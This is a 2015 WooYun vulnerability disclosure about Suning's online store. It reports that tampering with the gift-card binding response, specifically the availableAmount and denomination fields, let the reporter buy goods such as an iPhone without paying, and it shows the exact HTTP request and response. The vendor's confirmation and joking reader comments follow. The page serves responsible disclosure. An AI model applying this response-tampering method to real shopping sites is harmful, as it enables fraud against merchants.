当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126489

漏洞标题:苏宁易购主站逻辑缺陷不花钱即可可购买任意商品

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: 路人甲

提交时间:2015-07-14 09:42

修复时间:2015-08-28 09:48

公开时间:2015-08-28 09:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

iphone6 mac ?那都不是什么事儿

详细说明:

www.suning.com


是这样,sn之前给了个礼品卡,在使用的时候粗了事情!
在支付过程中需要邦定礼品卡,礼品卡是由两个字段组成。
邦定的请求

POST http://shopping.suning.com/bindCard.do HTTP/1.1
Host: shopping.suning.com
Connection: keep-alive
cardNo=XXXXXXX&password=XXXXXX


返回的信息

HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 07:53:30 GMT
Server: SNMW1.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Pragma: No-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 244
X-Via: 1.1 yangzhou45:9 (Cdn Cache Server V2.0)
Connection: keep-alive
{"cardNo":"XXXXXXXX","password":"XXXXXXXXX","cardName":"苏宁贵宾卡","cardType":"2","expireTime":"2017-12-31","availableAmount":"100000.00","denomination":"100000.00","description":"无限制使用","status":"1","errorMessage":""}


ok 将如下字段修改成
availableAmount":"100000.00","denomination":"100000.00" 那你就是富翁

漏洞证明:

下单买了个ip6

sn1.png


sn2.png


明天能到么?

修复方案:

漏洞猜想:目测这个礼品卡校验存在问题。要是只在激活时校验还是不够的,在使用时及使用后都及时校验。
另外,这个ip6发过来了我就捐wooyun!如果你们不想要回去!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-14 09:47

厂商回复:

问题比较严重,感谢提交。稍后有礼物送上。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-14 09:50 | 小人物Reno ( 普通白帽子 | Rank:471 漏洞数:110 | X)

    我准备把你上交国家

  2. 2015-08-28 11:11 | phantomer ( 路人 | Rank:8 漏洞数:4 | 菜比一个。求勿喷。)

    流弊

  3. 2015-08-28 12:05 | 小人物Reno ( 普通白帽子 | Rank:471 漏洞数:110 | X)

    收到ip6了?

  4. 2015-08-29 09:38 | 这只猪 ( 路人 | Rank:5 漏洞数:2 | 南无阿弥陀佛!)

    估计收到法院传单了

  5. 2015-08-29 10:16 | Rainism ( 路人 | Rank:11 漏洞数:3 | hacking for fun)

    苏宁易购发送礼品卡引发的漏洞检测,233333